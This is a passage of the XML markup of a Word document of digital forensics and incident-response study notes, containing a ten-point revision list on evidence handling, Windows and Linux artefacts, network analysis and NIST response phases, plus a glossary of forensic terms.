          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Revision — Ten Things to Remember</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = identify, preserve, collect, examine, analyse, report — without altering the original and with full documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Locard:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> every interaction leaves a trace — but traces need corroboration; they don’t prove </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain of custody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> records who, when, where, why for every handling of evidence; gaps destroy credibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Order of volatility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RAM → network → processes → users → open files → disk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write blocker + bit-stream image + hash verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = the foundation of sound acquisition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleted ≠ destroyed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MFT record inactive, data stays until overwritten; use carving with file signatures; check slack and unallocated space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows artefacts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry (USBSTOR, UserAssist, RecentDocs, Run keys), event logs (4624, 4625, 4720, 7045, 1102), Prefetch, LNK, Shellbags, browser databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux artefacts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log (auth.log, syslog), bash_history, /etc/passwd and shadow, cron, wtmp/btmp, inodes (ctime ≠ creation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network and email:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireshark + NetFlow + logs; beaconing, DNS tunnelling, lateral movement; read Received headers bottom-up; SPF/DKIM/DMARC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IR + reporting:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST phases (Preparation → Detection &amp; Analysis → Containment → Eradication → Recovery → Post-Incident); reports separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">fact → interpretation → conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Glossary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Artefact</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trace left on a system by user or system activity that has forensic value (e.g. a registry key, a log entry)</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Bit-stream image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Exact sector-by-sector copy of a storage device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Carving</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Recovering files from raw data using file signatures rather than the file system</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Chain of custody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Documented history of the possession and handling of evidence</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C2 / Beaconing</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Communication between malware and the attacker’s server; periodic check-ins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Cluster</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Smallest allocation unit of disk space for files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EDR / SIEM</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Endpoint Detection and Response / Security Information and Event Management (central log collection and alerting)</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Exfiltration</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Unauthorised transfer of data out of an organisation</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Hash value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Fixed-length fingerprint of data, used to verify integrity</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IOC</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Indicator of Compromise — observable sign of malicious activity</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MACB</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Modified, Accessed, Changed, Born (created) timestamps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MFT</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Master File Table — NTFS database of file records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Metadata</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about data (author, time, location, file system attributes)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Order of volatility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Ranking of evidence by how quickly it disappears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PCAP</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format storing captured network packets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Persistence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Technique used by malware or attackers to remain on a system after restarts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Prefetch</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Windows files recording application execution</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Slack space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Unused space between the end of a file and the end of its last cluster</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SPAN / TAP</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Switch port mirroring / physical device for copying network traffic</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Timestomping</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Deliberate alteration of file timestamps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Unallocated space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Disk space not currently assigned to any file; may contain deleted data</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Volatile data</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lost when power is removed (RAM, running processes, connections)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Write blocker</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Device or software that prevents writing to evidence media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pP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746"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">Digital Forensics &amp; Incident Response — Study Notes</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>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abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15"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2026-10-08T10:45:02.448Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-08T10:45:02.455Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>